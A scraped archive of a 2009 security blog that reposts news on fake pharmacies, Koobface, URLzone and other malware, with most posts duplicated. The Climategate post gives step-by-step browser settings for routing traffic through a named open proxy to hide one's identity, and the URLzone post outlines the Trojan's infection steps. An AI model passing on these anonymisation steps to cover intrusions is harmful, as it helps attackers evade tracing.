It’s not just limited to Trend Micro, either. AV-Test.org has released their findings for the first half of the year recently, with similar results. Both organizations expect the growth to continue, with little relief in sight.
Friday, December 11, 2009
Cyber-criminals cashing in with online pharmacies
From: http://technology.timesonline.co.uk/tol/news/tech_and_web/article6935651.ece
Thousands of Britons are putting their health and bank accounts at risk by going online to buy drugs from bogus internet pharmacies run by Russian cyber-criminals, according to a new report.
Despite repeated warnings, people eager to protect themselves against a range of diseases, such as swine flu, are shopping at fake online pharmacies with names such as Canadian Pharmacy or European Pharmacy.
The sites, which even carry forged copies of certificates supposedly guaranteeing their authenticity, are run by Russian criminal gangs that are making millions by flooding the internet with billions of spam messages selling drugs including Tamiflu and Viagra.
Those who are tempted by the offers of cheap drugs risk receiving potentially harmful prescriptions and could be putting their credit card and other personal details in the hands of conmen, according to an investigation by Sophos, an internet security company.
 
Research by Sophos into one criminal network found that fears over the spread of swine flu has sent demand for Tamiflu soaring in the US, Germany, the UK, Canada and France.
The Department of Health has said that more than three million healthy British children will be offered vaccinations against swine flu after a “striking rise” in the number of under-fives requiring hospital treatment.
However, the deaths of 214 people in Britain have been connected with the virus. Graham Cluley, of Sophos, said: “It is essential that we all resist the panic-induced temptation to purchase Tamiflu online. The criminal gangs working behind the scenes at fake internet pharmacies are putting their customers’ health, personal information and credit card details at risk.
“They have no problem breaking the law by spamming millions of people to promote these websites, so you can be sure they’ll have no qualms in exploiting your confidential data or selling you medications, which may put your life in danger. If you think you need medication go to your real doctor and stay away from quacks on the internet,” he added.
Sophos found that criminal networks of marketing “affiliates” or “partnerka” were driving online shoppers to virtual pharmacies in return for a share of the profits. Investigators believe tens of thousands of fraudsters, mostly based in Russia, are promoting the illegal goods with millions of spam messages and malicious software programmes.
The partnerka operate as well-run businesses. Organisers are known to put on expensive parties for their members, send generous gifts and even run lotteries in which the top producer wins a luxury car.
Sophos’s research discovered that in one of the most well-established affiliate networks operating out of Russia, called Glavmed, affiliate members can make $16,000 a day promoting pharmaceutical websites giving them potential annual earnings of £5.8 million. The criminals can be members of more than one affiliate network and some have boasted of earning more than $100,000 a day. Glavmed is associated with more than 120,000 fake drug websites, the majority branded “Canadian Pharmacy”, taking advantage of Canada’s reputation in the US, the biggest market for online medications, for cheap prescription drugs.
Criminals also infect computers with software that directs those searching for Tamiflu on search engines to the fake sites. Other techniques include inserting spam comments in blogs and on social networks. Those who do order Tamiflu or other drugs from these sites often receive nothing.
However, those who see their orders filled run an additional risk. When security researchers at Cisco’s IronPort ordered pills and had them analysed they found that two thirds of the shipments, which came from India, contained the correct active ingredient but in the wrong dosages, others were placebos. “Consumers take a significant risk of ingesting an uncontrolled substance from overseas distributors,” the researchers said.
The new warning came after hundreds of websites were shut down last week for selling fake or illicit drugs around the world. Interpol and the UK Medicines and Healthcare Products Regulatory Agency co-ordinated raids in 24 countries, confiscating thousands of orders linked to more than 750 illegal websites.
A Department of Health spokesman said: “There is no need to pay for antivirals. They are free on the NHS and being offered to all who need them. Anyone who buys medicines from internet sites could be in danger of receiving counterfeit or substandard medicines.”
• There are more than 200 genuine online pharmacies in Canada, which has a reputation for providing cheap, safe medications. Consumers should only use an online pharmacy if it is licensed, offers security and privacy of information, provides an address and phone number, requires a valid prescription and medical data.
Thousands of Britons are putting their health and bank accounts at risk by going online to buy drugs from bogus internet pharmacies run by Russian cyber-criminals, according to a new report.
Despite repeated warnings, people eager to protect themselves against a range of diseases, such as swine flu, are shopping at fake online pharmacies with names such as Canadian Pharmacy or European Pharmacy.
The sites, which even carry forged copies of certificates supposedly guaranteeing their authenticity, are run by Russian criminal gangs that are making millions by flooding the internet with billions of spam messages selling drugs including Tamiflu and Viagra.
Those who are tempted by the offers of cheap drugs risk receiving potentially harmful prescriptions and could be putting their credit card and other personal details in the hands of conmen, according to an investigation by Sophos, an internet security company.
Research by Sophos into one criminal network found that fears over the spread of swine flu has sent demand for Tamiflu soaring in the US, Germany, the UK, Canada and France.
The Department of Health has said that more than three million healthy British children will be offered vaccinations against swine flu after a “striking rise” in the number of under-fives requiring hospital treatment.
However, the deaths of 214 people in Britain have been connected with the virus. Graham Cluley, of Sophos, said: “It is essential that we all resist the panic-induced temptation to purchase Tamiflu online. The criminal gangs working behind the scenes at fake internet pharmacies are putting their customers’ health, personal information and credit card details at risk.
“They have no problem breaking the law by spamming millions of people to promote these websites, so you can be sure they’ll have no qualms in exploiting your confidential data or selling you medications, which may put your life in danger. If you think you need medication go to your real doctor and stay away from quacks on the internet,” he added.
Sophos found that criminal networks of marketing “affiliates” or “partnerka” were driving online shoppers to virtual pharmacies in return for a share of the profits. Investigators believe tens of thousands of fraudsters, mostly based in Russia, are promoting the illegal goods with millions of spam messages and malicious software programmes.
The partnerka operate as well-run businesses. Organisers are known to put on expensive parties for their members, send generous gifts and even run lotteries in which the top producer wins a luxury car.
Sophos’s research discovered that in one of the most well-established affiliate networks operating out of Russia, called Glavmed, affiliate members can make $16,000 a day promoting pharmaceutical websites giving them potential annual earnings of £5.8 million. The criminals can be members of more than one affiliate network and some have boasted of earning more than $100,000 a day. Glavmed is associated with more than 120,000 fake drug websites, the majority branded “Canadian Pharmacy”, taking advantage of Canada’s reputation in the US, the biggest market for online medications, for cheap prescription drugs.
Criminals also infect computers with software that directs those searching for Tamiflu on search engines to the fake sites. Other techniques include inserting spam comments in blogs and on social networks. Those who do order Tamiflu or other drugs from these sites often receive nothing.
However, those who see their orders filled run an additional risk. When security researchers at Cisco’s IronPort ordered pills and had them analysed they found that two thirds of the shipments, which came from India, contained the correct active ingredient but in the wrong dosages, others were placebos. “Consumers take a significant risk of ingesting an uncontrolled substance from overseas distributors,” the researchers said.
The new warning came after hundreds of websites were shut down last week for selling fake or illicit drugs around the world. Interpol and the UK Medicines and Healthcare Products Regulatory Agency co-ordinated raids in 24 countries, confiscating thousands of orders linked to more than 750 illegal websites.
A Department of Health spokesman said: “There is no need to pay for antivirals. They are free on the NHS and being offered to all who need them. Anyone who buys medicines from internet sites could be in danger of receiving counterfeit or substandard medicines.”
• There are more than 200 genuine online pharmacies in Canada, which has a reputation for providing cheap, safe medications. Consumers should only use an online pharmacy if it is licensed, offers security and privacy of information, provides an address and phone number, requires a valid prescription and medical data.
Thursday, December 10, 2009
A Separate AV/Malware Box?
For those admins who are looking to refresh their proxy architecture, and looking at the various vendors out there for Secure Web Gateways, you may be wondering whether there's a benefit to having the AV (anti-virus) and malware scanning on a separate box.  The 600 lb gorilla in the marketplace for web gateway appliances, Blue Coat Systems uses a two box architecture, while most of the competitors, use a single box design running the AV and malware scanning on the same box as the gateway.
What's the advantage to the second box? In reality the big gain is scale and throughput. By offloading to a second box, you can handle much bigger throughput and you can handle many more connections. If neither of these is a concern for you, you should also consider when an AV or malware engine goes into a CPU usage storm, whether you want it to affect the other users using the web gateway. There are files designed to cause AV engines to go into infinite processing loops and if your AV or malware engine hasn't been tuned to detect these, an AV CPU spike will cause web downtime for your end-users if you aren't using a separate box for AV and malware scanning.
If web access isn't mission critical to your organization, and you aren't concerned with scale and throughput, a single box solution may be the answer. But before you go that route, make sure you price out the two box solution, and make the right decision based on all the factors and features available to you.
What's the advantage to the second box? In reality the big gain is scale and throughput. By offloading to a second box, you can handle much bigger throughput and you can handle many more connections. If neither of these is a concern for you, you should also consider when an AV or malware engine goes into a CPU usage storm, whether you want it to affect the other users using the web gateway. There are files designed to cause AV engines to go into infinite processing loops and if your AV or malware engine hasn't been tuned to detect these, an AV CPU spike will cause web downtime for your end-users if you aren't using a separate box for AV and malware scanning.
If web access isn't mission critical to your organization, and you aren't concerned with scale and throughput, a single box solution may be the answer. But before you go that route, make sure you price out the two box solution, and make the right decision based on all the factors and features available to you.
Wednesday, December 9, 2009
Hackers Exploit Tiger Woods Car Accident to Spread Malware
From: http://blogs.pcmag.com/securitywatch/2009/11/hackers_exploit_tiger_woods_ca.php
Unless you've been in a cave or working or something like that, you know that famed golfer Tiger Woods was in a car accident recently. News outlets, respectable and otherwise, have been hard at work filling us in on every available detail, genuine and otherwise, about the incident.
Cybercriminals are not being left out of the act according to security firm Sophos. The threat comes in the form of a web page claiming to have video content related to the accident. If you're a regular reader of this blog, the rest is predictable: Click to play the video and you are taken to another web page which pushes a file (Movie_HD_Plugin_Update.40014.exe) claiming to be a video plug-in necessary to watch the video. Sophos detects it as Troj/Proxy-JN.
Unless you've been in a cave or working or something like that, you know that famed golfer Tiger Woods was in a car accident recently. News outlets, respectable and otherwise, have been hard at work filling us in on every available detail, genuine and otherwise, about the incident.
Cybercriminals are not being left out of the act according to security firm Sophos. The threat comes in the form of a web page claiming to have video content related to the accident. If you're a regular reader of this blog, the rest is predictable: Click to play the video and you are taken to another web page which pushes a file (Movie_HD_Plugin_Update.40014.exe) claiming to be a video plug-in necessary to watch the video. Sophos detects it as Troj/Proxy-JN.
Tuesday, December 8, 2009
Cloud security service looks for malware
Webroot Tuesday announced it has extended its cloud-based Web security service, adding a way to filter outbound as well as inbound Web traffic, monitoring for threats in order to detect and block malware such as botnets that have infected computers. 
"We already have inbound filtering and now we're adding outbound," says Brian Czarny, vice president of solutions marketing at Webroot about the Web Security Service that can now monitor for signs of malware-infected corporate computers trying to "call home" for more instructions, a common practice among criminally run botnets. If the cloud-based Webroot service detects malware such as botnet code calling out to get instructions or otherwise perform an activity, it will block that request, though not all traffic on the user's machine. The Webroot service would then notify the systems administrator of the security event via e-mail and the Web-based administrative console where reports can be obtained.
Czarny says there is no additional charge for the outbound monitoring now available through the Webroot Web Security Service, which also includes some basic URL filtering for productivity purposes. The service works by having the corporation proxy its Web traffic through Webroot’s data centers where a variety of security methods can clean malware and ward off phishing attacks.
Webroot is also announcing on Tuesday an in-the-cloud e-mail archiving service that lets customers store e-mail to be searched and retrieved whether from on-site corporate mail servers or Google Apps.
The pricing for the e-mail archiving is $6 per month per user for unlimited storage and retention; the Web Security Serivce costs $5 per user per month, with discounts based on volume.
"We already have inbound filtering and now we're adding outbound," says Brian Czarny, vice president of solutions marketing at Webroot about the Web Security Service that can now monitor for signs of malware-infected corporate computers trying to "call home" for more instructions, a common practice among criminally run botnets. If the cloud-based Webroot service detects malware such as botnet code calling out to get instructions or otherwise perform an activity, it will block that request, though not all traffic on the user's machine. The Webroot service would then notify the systems administrator of the security event via e-mail and the Web-based administrative console where reports can be obtained.
Czarny says there is no additional charge for the outbound monitoring now available through the Webroot Web Security Service, which also includes some basic URL filtering for productivity purposes. The service works by having the corporation proxy its Web traffic through Webroot’s data centers where a variety of security methods can clean malware and ward off phishing attacks.
Webroot is also announcing on Tuesday an in-the-cloud e-mail archiving service that lets customers store e-mail to be searched and retrieved whether from on-site corporate mail servers or Google Apps.
The pricing for the e-mail archiving is $6 per month per user for unlimited storage and retention; the Web Security Serivce costs $5 per user per month, with discounts based on volume.
Monday, December 7, 2009
Climategate Hack Used Open Proxies
An interesting story about using an open proxy to hack a website...
From: http://erratasec.blogspot.com/2009/11/climate-hack-used-open-proxies.html
More details are emerging about the "Climategate" hack. It appears that the hacker used an "open proxy" in order to hide the origin of the attack. However, the hacker may have made a mistake, and a review of the logs at RealClimate and ClimateAudit may reveal his/her identity.
As this post describes, the hacker made a comment to a ClimateAudit blog post from IP address 82.208.87.170. If we Google that IP address, we see that it is indeed an open proxy. We don't know the hacker's real IP address.
An "open proxy" is a machine that has been misconfigured to forward requests back out to the Internet. Hackers constantly rescan the Internet looking for these open proxies, usually HTTP proxies at ports 80, 8080, and 3127, or SOCKS at port 1080. Hacker websites maintain lists of active misconfigured proxies. When hackers want to be anonymous, they choose one of these proxies at random, they configure their web browser to go through the proxy. In this manner, anything they do appears to come from the proxy's IP address, and not from the hacker's IP address.
You can use this open proxy yourself to hide your identity. In Firefox, go to "Tools", "Options", "Adanced", "Network", "Settings" to open the proxy dialog box. Then do a "Manual proxy configuration", setting the "HTTP Proxy" to 82.208.87.170, and the port to 8080.
After that, you should be able to browse the Internet just fine (albeit slowly). I went to the Google search page, but was redirected to the Russian version. Open proxies are a great way to see how the rest of the world browses the Internet.
However, there is a flaw. Most proxies also forward the original IP address as a separate field in the web request. I set my browser to the above proxy, and looked at the resulting HTTP request headers. I found the proxy added the header "X-Forwarded-For:" with my original IP address.
Most web server logs ignore the "X-Forwarded-For:" header, which means that this information is lost forever. However, if RealClimate or ClimateAudit has some advanced logging enabled, then they might be able to discover the original IP address.
The RealClimate website (which was attacked by the hacker) makes this claim:
The use of a turkish computer would seem to imply that this upload and hack was not solely a whistleblower act, but one that involved more sophisticated knowledge.
This is not true. Using open proxies requires no sophisticated knowledge at all - as this blog post shows.
So, the timeline appears to be:
•Oct 12: somebody sends the same e-mails to BBC journalist Paul Hudson.
•Nov 12: sometime after this data, the hacker grabs the files and puts them into a ZIP.
•Nov 17 6:20am: Hacker uploads the file to http://www.realclimate.org/FOIA.zip from an IP address "somewhere in Turkey".
•Nov 17 7:24am: Hackers posts a comment to the ClimateAudit blog saying "A miracle just happened" with a link back to the RealClimate ZIP file. Hacker proxied through 82.208.87.170:8080.
•Nov 17 "a few hours later": RealClimate admins discover the hack and remove the file.
•Nov 19: Hackers posts file to open FTP server in Russia.
•Nov 19: Hacker posts to Air Vent blog pointing to the FTP ZIP. Hacker uses proxy 212.116.220.100:443, an open proxy in Saudi Arabia.
RealClimate hasn't said exactly how their website was "hacked into". I'm guessing a PHP bug found by an average webapp scanner. Their Archive page appears broken, giving the following raw PHP code instead. I assume that's where the hacker broke in:
    
UPDATE: Commenters at ClimateAudit point out a simpler explanation of the RealClimate hack: several of the people at CRU post at RealClimate. The hacker could simply have pretended to be one of those people requesting to reset the password, then intercepted the e-mail with the new password. This is a common hack: once you have access to a person's e-mail account, you can probably get the password an every other account (banking, blogging, facebook, twitter, etc.) that uses that e-mail address.
From: http://erratasec.blogspot.com/2009/11/climate-hack-used-open-proxies.html
More details are emerging about the "Climategate" hack. It appears that the hacker used an "open proxy" in order to hide the origin of the attack. However, the hacker may have made a mistake, and a review of the logs at RealClimate and ClimateAudit may reveal his/her identity.
As this post describes, the hacker made a comment to a ClimateAudit blog post from IP address 82.208.87.170. If we Google that IP address, we see that it is indeed an open proxy. We don't know the hacker's real IP address.
An "open proxy" is a machine that has been misconfigured to forward requests back out to the Internet. Hackers constantly rescan the Internet looking for these open proxies, usually HTTP proxies at ports 80, 8080, and 3127, or SOCKS at port 1080. Hacker websites maintain lists of active misconfigured proxies. When hackers want to be anonymous, they choose one of these proxies at random, they configure their web browser to go through the proxy. In this manner, anything they do appears to come from the proxy's IP address, and not from the hacker's IP address.
You can use this open proxy yourself to hide your identity. In Firefox, go to "Tools", "Options", "Adanced", "Network", "Settings" to open the proxy dialog box. Then do a "Manual proxy configuration", setting the "HTTP Proxy" to 82.208.87.170, and the port to 8080.
After that, you should be able to browse the Internet just fine (albeit slowly). I went to the Google search page, but was redirected to the Russian version. Open proxies are a great way to see how the rest of the world browses the Internet.
However, there is a flaw. Most proxies also forward the original IP address as a separate field in the web request. I set my browser to the above proxy, and looked at the resulting HTTP request headers. I found the proxy added the header "X-Forwarded-For:" with my original IP address.
Most web server logs ignore the "X-Forwarded-For:" header, which means that this information is lost forever. However, if RealClimate or ClimateAudit has some advanced logging enabled, then they might be able to discover the original IP address.
The RealClimate website (which was attacked by the hacker) makes this claim:
The use of a turkish computer would seem to imply that this upload and hack was not solely a whistleblower act, but one that involved more sophisticated knowledge.
This is not true. Using open proxies requires no sophisticated knowledge at all - as this blog post shows.
So, the timeline appears to be:
•Oct 12: somebody sends the same e-mails to BBC journalist Paul Hudson.
•Nov 12: sometime after this data, the hacker grabs the files and puts them into a ZIP.
•Nov 17 6:20am: Hacker uploads the file to http://www.realclimate.org/FOIA.zip from an IP address "somewhere in Turkey".
•Nov 17 7:24am: Hackers posts a comment to the ClimateAudit blog saying "A miracle just happened" with a link back to the RealClimate ZIP file. Hacker proxied through 82.208.87.170:8080.
•Nov 17 "a few hours later": RealClimate admins discover the hack and remove the file.
•Nov 19: Hackers posts file to open FTP server in Russia.
•Nov 19: Hacker posts to Air Vent blog pointing to the FTP ZIP. Hacker uses proxy 212.116.220.100:443, an open proxy in Saudi Arabia.
RealClimate hasn't said exactly how their website was "hacked into". I'm guessing a PHP bug found by an average webapp scanner. Their Archive page appears broken, giving the following raw PHP code instead. I assume that's where the hacker broke in:
Archives by Month: Archives by Category:
UPDATE: Commenters at ClimateAudit point out a simpler explanation of the RealClimate hack: several of the people at CRU post at RealClimate. The hacker could simply have pretended to be one of those people requesting to reset the password, then intercepted the e-mail with the new password. This is a common hack: once you have access to a person's e-mail account, you can probably get the password an every other account (banking, blogging, facebook, twitter, etc.) that uses that e-mail address.
Friday, December 4, 2009
The Latest in Trojan Attacks
From http://www.webhostingfan.com/2009/12/the-latest-in-trojan-attacks/
Just when it seems as though malware and Trojan attacks could not get much worse, along comes yet another to toss a monkey wrench into the works. The latest Trojan horse program to be released on the Web is the URLzone Trojan that attacks banks.
Is that your bank?
The URLzone Trojan horse program was discovered by Finjan Software at the end of September, 2009 and has been reported as being extremely advanced. The program rewrites bank pages in such a way that unsuspecting victims have no idea that their bank accounts are being emptied. With an integrated command-and-control interface, nefarious types can set specific amounts they would like to remove from their victims accounts.
Slippery little bugger
Not only has this bit of malicious coding gathered the interest of Finjan but RSA Security has been tracking and researching URLzone. Thus far the Trojan horse program has proven to be a bit of a slippery one to catch. The malware uses several techniques to peg machines being used by law enforcement and investigators in attempts to catch URLzone. The one good thing to come of is the creators of the program know they are now being watched and reacting.
Just how slippery is this Trojan? Once it has detected it is being monitored, it continues to force a money transfer. Instead of using one of its own people, it grabs a legitimate and innocent victim who has been part of legal money transfers in the past and makes it appear as though that person is generating the transaction. The end result is a bunch of very confused investigators.
To date, over 400 unsuspecting accounts have been used as mules, over 6,400 computers have been infected with URLzone, and the total amount cleared on a daily basis has been in excess of $17,500.
How does it work?
How does URLzone work its way onto unsuspecting computers? Once the malware executes, a copy is made of itself to c:\uninstall02.exe. An ID is created and this is sent along with a version ID of URLzone to the command-and-control interface. This effectively sends a confirmation that the machine in question is now infected with the Trojan. The command-and-control interface then logs the information, downloads a new executable, and copies itself to the SYSTEM32 directory with a random and hidden name. The program does not change any existing system files and needs to add itself to the startup registry each time the machine in question is rebooted.
At this point, URLzone hooks itself to the svchost.exe process and quietly checks with the command-and-control interface for new updates and commands while simultaneously watching for web browsers to open. Once a web browser is opened, the Trojan horse program goes to work and the unsuspecting computer user is completely unaware anything is happening.
Final Thoughts
All in all, the URLzone Trojan horse program is one nasty piece of work. The best defense any computer user can take is ensuring that their operating system is up to date with the latest security updates and their anti-virus protection software has been recently updated with all the latest information.
Once again, you should also make sure you're protecting your end-users from browsing malware sites, and your proxy is scanning for malware, with the latest anti-malware updates.
Just when it seems as though malware and Trojan attacks could not get much worse, along comes yet another to toss a monkey wrench into the works. The latest Trojan horse program to be released on the Web is the URLzone Trojan that attacks banks.
Is that your bank?
The URLzone Trojan horse program was discovered by Finjan Software at the end of September, 2009 and has been reported as being extremely advanced. The program rewrites bank pages in such a way that unsuspecting victims have no idea that their bank accounts are being emptied. With an integrated command-and-control interface, nefarious types can set specific amounts they would like to remove from their victims accounts.
Slippery little bugger
Not only has this bit of malicious coding gathered the interest of Finjan but RSA Security has been tracking and researching URLzone. Thus far the Trojan horse program has proven to be a bit of a slippery one to catch. The malware uses several techniques to peg machines being used by law enforcement and investigators in attempts to catch URLzone. The one good thing to come of is the creators of the program know they are now being watched and reacting.
Just how slippery is this Trojan? Once it has detected it is being monitored, it continues to force a money transfer. Instead of using one of its own people, it grabs a legitimate and innocent victim who has been part of legal money transfers in the past and makes it appear as though that person is generating the transaction. The end result is a bunch of very confused investigators.
To date, over 400 unsuspecting accounts have been used as mules, over 6,400 computers have been infected with URLzone, and the total amount cleared on a daily basis has been in excess of $17,500.
How does it work?
How does URLzone work its way onto unsuspecting computers? Once the malware executes, a copy is made of itself to c:\uninstall02.exe. An ID is created and this is sent along with a version ID of URLzone to the command-and-control interface. This effectively sends a confirmation that the machine in question is now infected with the Trojan. The command-and-control interface then logs the information, downloads a new executable, and copies itself to the SYSTEM32 directory with a random and hidden name. The program does not change any existing system files and needs to add itself to the startup registry each time the machine in question is rebooted.
At this point, URLzone hooks itself to the svchost.exe process and quietly checks with the command-and-control interface for new updates and commands while simultaneously watching for web browsers to open. Once a web browser is opened, the Trojan horse program goes to work and the unsuspecting computer user is completely unaware anything is happening.
Final Thoughts
All in all, the URLzone Trojan horse program is one nasty piece of work. The best defense any computer user can take is ensuring that their operating system is up to date with the latest security updates and their anti-virus protection software has been recently updated with all the latest information.
Once again, you should also make sure you're protecting your end-users from browsing malware sites, and your proxy is scanning for malware, with the latest anti-malware updates.
Thursday, December 3, 2009
Koobface using new tricks to infect this holiday season
The criminals behind Koobface are gearing up for some malicious holiday fun according to reports from Websense and McAfee. The Malware, which has been seen online in various formats for a while now, is using Google Reader to spread itself and offers a few other tricks this time around.
First detected in December last year (with a more powerful version emerging in March of this year), the Koobface worm targets users of social networking sites like Facebook, MySpace, Twitter and most recently Skype. In recent days the security industry has noted increased activity of the Koobface attack, which spreads by delivering messages to people who are ‘friends’ of social network users whose computers have already been infected by the worm.
McAfee is warning about a version of a Koobface run that mirrors the report from Websense that The Tech Herald received recently. Both vendors are seeing attacks from the Malware that linkup to a “video” of a cute little baby dressed up as Santa. The tiny tike has no idea his image is being used to spread Malware, but anyone who attempts to load the video (named SantA in some cases) is sent a message that they need to load a codec to play the movie. However, as in previous Koobface attacks, the codec is malicious and does nothing but infect the system.
Moreover, McAfee notes that some of the attacks will push users to another site when they attempt to watch the movie when it appears in Google Reader as a link. This secondary site is made up to look like a Facebook page that ironically warns users about Koobface and offers a link to download a virus scanner. This scanner is the Malware delivery method, and once downloaded and installed, more malicious files are sent to the infected system.
In addition to the false Facebook page, McAfee noted that infected users will be lured into cracking CAPTCHA codes so that those behind Koobface can register more junk Facebook profiles. The CAPTCHA trick will appear as a Windows warning that the system will be shut down unless they enter the CAPTCHA code displayed. If the shutdown timer hits zero, the system is locked until the code is entered. Once entered, the code is sent to a server where the information is later used for account creation.
In the past, The Tech Herald has talked about malicious wall posts on Facebook thanks to Koobface, and this latest wave of attacks appears to us to be an attempt to further the reach of those posts. More information on those attacks can be accessed here.
Websense, adding to the attack information, reports that there is a Social Engineering tactic being used, where the periods in the malicious URL are replaced by commas. Speculating, Websense said that the commas are used in the hope that the user will copy and paste the URL into their browser and replace them with the correct character, thinking that the friend who sent them made a mistake when entering the URL information.
Both vendors expressed the need for users to use caution when they see random Facebook wall posts, and that they should not download files from untrusted sources. In addition to that advice, we’ve noticed that some of the false video pages misspell the “You” in YouTube, which is a clear sign something is wrong, aside from the fact the video isn’t being hosted on YouTube itself.
And of course, if you haven't already, you should consider putting a proxy into your network to help protect end-users from malware and spyware.
First detected in December last year (with a more powerful version emerging in March of this year), the Koobface worm targets users of social networking sites like Facebook, MySpace, Twitter and most recently Skype. In recent days the security industry has noted increased activity of the Koobface attack, which spreads by delivering messages to people who are ‘friends’ of social network users whose computers have already been infected by the worm.
McAfee is warning about a version of a Koobface run that mirrors the report from Websense that The Tech Herald received recently. Both vendors are seeing attacks from the Malware that linkup to a “video” of a cute little baby dressed up as Santa. The tiny tike has no idea his image is being used to spread Malware, but anyone who attempts to load the video (named SantA in some cases) is sent a message that they need to load a codec to play the movie. However, as in previous Koobface attacks, the codec is malicious and does nothing but infect the system.
Moreover, McAfee notes that some of the attacks will push users to another site when they attempt to watch the movie when it appears in Google Reader as a link. This secondary site is made up to look like a Facebook page that ironically warns users about Koobface and offers a link to download a virus scanner. This scanner is the Malware delivery method, and once downloaded and installed, more malicious files are sent to the infected system.
In addition to the false Facebook page, McAfee noted that infected users will be lured into cracking CAPTCHA codes so that those behind Koobface can register more junk Facebook profiles. The CAPTCHA trick will appear as a Windows warning that the system will be shut down unless they enter the CAPTCHA code displayed. If the shutdown timer hits zero, the system is locked until the code is entered. Once entered, the code is sent to a server where the information is later used for account creation.
In the past, The Tech Herald has talked about malicious wall posts on Facebook thanks to Koobface, and this latest wave of attacks appears to us to be an attempt to further the reach of those posts. More information on those attacks can be accessed here.
Websense, adding to the attack information, reports that there is a Social Engineering tactic being used, where the periods in the malicious URL are replaced by commas. Speculating, Websense said that the commas are used in the hope that the user will copy and paste the URL into their browser and replace them with the correct character, thinking that the friend who sent them made a mistake when entering the URL information.
Both vendors expressed the need for users to use caution when they see random Facebook wall posts, and that they should not download files from untrusted sources. In addition to that advice, we’ve noticed that some of the false video pages misspell the “You” in YouTube, which is a clear sign something is wrong, aside from the fact the video isn’t being hosted on YouTube itself.
And of course, if you haven't already, you should consider putting a proxy into your network to help protect end-users from malware and spyware.
Wednesday, December 2, 2009
New malware scam targets Twilight fans
PC Tools' Malware Research Center is warning web users of another online scam that hopes to piggyback on hype surrounding the new Twilight New Moon film. 
The security software developer says the latest trick tempts movie fans by promising them they can watch the film for free, before installing malware on their computer.
PC Tools said fans are baited with the text websites, chat rooms and blogs that read: 'Watch New Moon Full Movie.'
Meanwhile, comment posts are filled with related keywords to attract search engines. Then, when fans search for the film they find links to stolen images from the movie itself, convincing the fan the movie is only one click away.
However, after clicking on the 'movie player', users are told to run a 'streamviewer' which installs malware on their computers.
This is the second malware scam targeting Twilight New Moon in a week. Last week, PC Tools warned that malicious websites that claim to feature interviews with the author of the books, Stephanie Meyer, were ranking high in a number of search engines.
Instead of providing a video clip of Meyer, those visiting the site were directed to a window informing them they were infected with malware and then encouraged to download an antivirus solution to clean their PC.
This latest malware scam is a good reminder to have security for end-users via a proxy architecture, and the latest anti-malware installed on your proxy.
The security software developer says the latest trick tempts movie fans by promising them they can watch the film for free, before installing malware on their computer.
PC Tools said fans are baited with the text websites, chat rooms and blogs that read: 'Watch New Moon Full Movie.'
Meanwhile, comment posts are filled with related keywords to attract search engines. Then, when fans search for the film they find links to stolen images from the movie itself, convincing the fan the movie is only one click away.
However, after clicking on the 'movie player', users are told to run a 'streamviewer' which installs malware on their computers.
This is the second malware scam targeting Twilight New Moon in a week. Last week, PC Tools warned that malicious websites that claim to feature interviews with the author of the books, Stephanie Meyer, were ranking high in a number of search engines.
Instead of providing a video clip of Meyer, those visiting the site were directed to a window informing them they were infected with malware and then encouraged to download an antivirus solution to clean their PC.
This latest malware scam is a good reminder to have security for end-users via a proxy architecture, and the latest anti-malware installed on your proxy.
Monday, November 23, 2009
ICSA Labs Study Finds Majority of Security Products Do Not Perform as Intended
ICSA labs released the Product Assurance Report white paper (pdf) earlier this week and sparked a wave of blog posts and comments about the quality of security products.  There were some rather eye-opening results included in the paper.  The report findings indicated that some vendors and enterprise users consider logging a nuisance and merely a “box to check.”  According to the report, logging is a particular challenge for firewalls.  Almost every network firewall (97 percent) or Web application firewall (80 percent) tested experienced at least one logging problem.
Dozens of vendors have certified network and Web Application firewall products. In order to attain ICSA Labs Certified status, web application firewall products must pass a rigorous set of functional, performance and platform security requirements. Candidate web application firewall products must completely satisfy the entire set of baseline requirements. Only products that passed all the tests are certified.
The list of comprehensive specification is created by a consortium of vendors and the ICSA. Here's what ICSA advised enterprise companies before purchasing and using security products:
* Demand quality.
* Be suspicious of performance claims and numbers. Vet them. Question them. Be an educated, cautious buyer.
* Choose more established products over new.
* Choose simplicity over complexity.
* Use certified products!
* Prefer vendors that certify their products, and that participate in industry and ICSA Labs consortia and other standards bodies.
This report helps to prove that certified products have higher quality and also shows the importance of certified products for the enterprise. It's a good reason to make sure your proxy is ICSA Lab certified.
Dozens of vendors have certified network and Web Application firewall products. In order to attain ICSA Labs Certified status, web application firewall products must pass a rigorous set of functional, performance and platform security requirements. Candidate web application firewall products must completely satisfy the entire set of baseline requirements. Only products that passed all the tests are certified.
The list of comprehensive specification is created by a consortium of vendors and the ICSA. Here's what ICSA advised enterprise companies before purchasing and using security products:
* Demand quality.
* Be suspicious of performance claims and numbers. Vet them. Question them. Be an educated, cautious buyer.
* Choose more established products over new.
* Choose simplicity over complexity.
* Use certified products!
* Prefer vendors that certify their products, and that participate in industry and ICSA Labs consortia and other standards bodies.
This report helps to prove that certified products have higher quality and also shows the importance of certified products for the enterprise. It's a good reason to make sure your proxy is ICSA Lab certified.
Thursday, November 19, 2009
Crime breaks barriers
We've talked about the fact that the motivation behind hackers has changed in recent years.  Hackers do it for the money nowadays.  Crime on the internet pays. 
From a news article on the topic:
While these scams and the money aspect isn't new news, it's a good reminder why we have proxies in place to secure our access to the internet from our organizations. The article also provides some good reminders:
We've talked in the past here about real-time protection on your proxy. Since user education can only go so far, making sure your proxy has the capability to do real-time rating is more important than ever coupled with malware scanning capability.
From a news article on the topic:
A recent study by TrendMicro reveals that Google Trends, a public web facility of Google, which shows how a particular search term is relative to the total search volume has been used by cyber criminals to find the most popular search terms. They then use these terms to point to links to their malicious sites, allowing them to victimize more people. Clearly, cyber crooks seem to be keeping up with the most recent technological advancements, using newly released applications to profit as much as possible.
Apart from poisoning the top search results, cyber criminals have been found to use GeoIP tracking as a social engineering tactic. This helps the bad guys to identify the geographical location of an internet-connected computer, mobile device, or website visitor. Geolocation data can include information such as country, region, city, postal/zip code, latitude, longitude and time zone.
Using geolocation data, cyber criminals can customize spammed emails and URLs to fool users into thinking that these are from non-malicious sources. This increases the possibility of malicious emails spreading, even while users unsuspectingly click on these links.
Says Abhinav Karnwal, product marketing manager, Trend Micro: “Malicious websites are making around $10,000 every day. It all starts with a pop-up showing a problem in your computer. The user would go to the internet and look for an anti-virus (AV) software. These malicious sites feign the look and feel of an authentic anti-virus company. The site would run a scan on your computer and show multiple errors, which doesn’t actually exist in reality. It would ask the user to pay a certain amount and download the AV file. After payment, the fake AV programme would indicate that your computer is free from errors, which never existed anyway.”
